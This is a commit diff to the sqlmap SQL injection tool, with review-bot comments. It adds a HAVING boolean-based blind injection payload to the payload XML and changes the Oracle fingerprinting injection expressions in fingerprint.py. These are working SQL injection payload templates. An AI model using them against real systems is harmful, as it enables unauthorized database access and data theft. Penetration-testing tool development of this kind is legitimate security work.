

Commit 25369ca

committed
Adding new payload (HAVING boolean-based blind)
1 parent a399b65 commit 25369ca

4 files changed

Lines changed: 26 additions & 9 deletions


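--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.2.6.4"
+VERSION = "1.2.6.5"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)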

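--- a/plugins/dbms/oracle/fingerprint.py
+++ b/plugins/dbms/oracle/fingerprint.py
@@ -68,23 +68,23 @@ def checkDbms(self):
 infoMsg = "testing %s" % DBMS.ORACLE
 logger.info(infoMsg)
 
-# NOTE: SELECT ROWNUM=ROWNUM FROM DUAL does not work connecting
-# directly to the Oracle database
+# NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does
+# not work connecting directly to the Oracle database
 if conf.direct:
 result = True
 else:
-result = inject.checkBooleanExpression("ROWNUM=ROWNUM")
+result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")
 
 if result:
 infoMsg = "confirming %s" % DBMS.ORACLE
 logger.info(infoMsg)
 
-# NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does
+# NOTE: SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL does
 # not work connecting directly to the Oracle database
 if conf.direct:
 result = True
 else:
-result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")
+result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])")
 
 if not result:
 warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE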
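Review bot: The new confirmation expression on line 87 (new side), `NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])`, is passed as a plain string and nothing in the hunk shows where `[RANDNUM1]` is substituted before the query is sent; assuming that substitution happens inside the injection layer, a one-line comment such as `# [RANDNUM1] is replaced by a random number before the query is sent` would spare the next reader from tracing inject.checkBooleanExpression. The rewritten NOTE comment on line 82 also runs well past the width the other comments in this hunk keep to and could be wrapped onto two lines like the NOTE above it. checkDbms begins before the hunk and continues after it.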

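--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-9d0f7b5da86733268cf0ee3bcce3fd0e lib/core/settings.py
+ea76ddec1c3e65b63c217aaaf6e15e3c lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 6306284edcccc185b2df085438572b0d lib/core/target.py
@@ -177,7 +177,7 @@ fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py
 f772070dba85976a7894dac5046b93ea plugins/dbms/oracle/connector.py
 e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py
 c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py
-e16cbf8abda91a906ca7bafb81d8866e plugins/dbms/oracle/fingerprint.py
+538395c0e5ccb1b6befc17f129f45f29 plugins/dbms/oracle/fingerprint.py
 9cbce3d3747c67f18e65f9c1eb910b0e plugins/dbms/oracle/__init__.py
 5c2f1611c3ceface38a7e95650391ae6 plugins/dbms/oracle/syntax.py
 bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py
@@ -467,7 +467,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
 fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
 0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml
 a279656ea3fcb85c727249b02f828383 xml/livetests.xml
-14a2abeb88b00ab489359d0dd7a3017f xml/payloads/boolean_blind.xml
+3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml
 b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml
 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml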

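--- a/xml/payloads/boolean_blind.xml
+++ b/xml/payloads/boolean_blind.xml
@@ -1361,6 +1361,23 @@ Tag: <test>
 <dbms>SAP MaxDB</dbms>
 </details>
 </test>
+
+<!-- Works in MySQL, Oracle, etc. -->
+<test>
+<title>HAVING boolean-based blind - WHERE, GROUP BY clause</title>
+<stype>1</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>1,2</clause>
+<where>1</where>
+<vector>HAVING [INFERENCE]</vector>
+<request>
+<payload>HAVING [RANDNUM]=[RANDNUM]</payload>
+</request>
+<response>
+<comparison>HAVING [RANDNUM]=[RANDNUM1]</comparison>
+</response>
+</test>
 <!-- End of boolean-based blind tests - ORDER BY, GROUP BY clause -->
 
 <!-- Boolean-based blind tests - Stacked queries -->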
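Review bot: The new `<test>` block carries no `<details>`/`<dbms>` element, unlike the SAP MaxDB test that closes just above it, while its only scoping hint is the comment `Works in MySQL, Oracle, etc.`; if leaving `<details>` out is deliberate so the payload is tried against every back-end DBMS, the comment should say so, e.g. `<!-- Works in MySQL, Oracle, etc.; no <details> element on purpose so it is tried against every back-end DBMS -->`. If the omission is not deliberate, a `<details>` block naming the DBMSes it was verified on would make the scope explicit the way the neighbouring tests do. The enclosing document element starts and ends outside the hunk.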
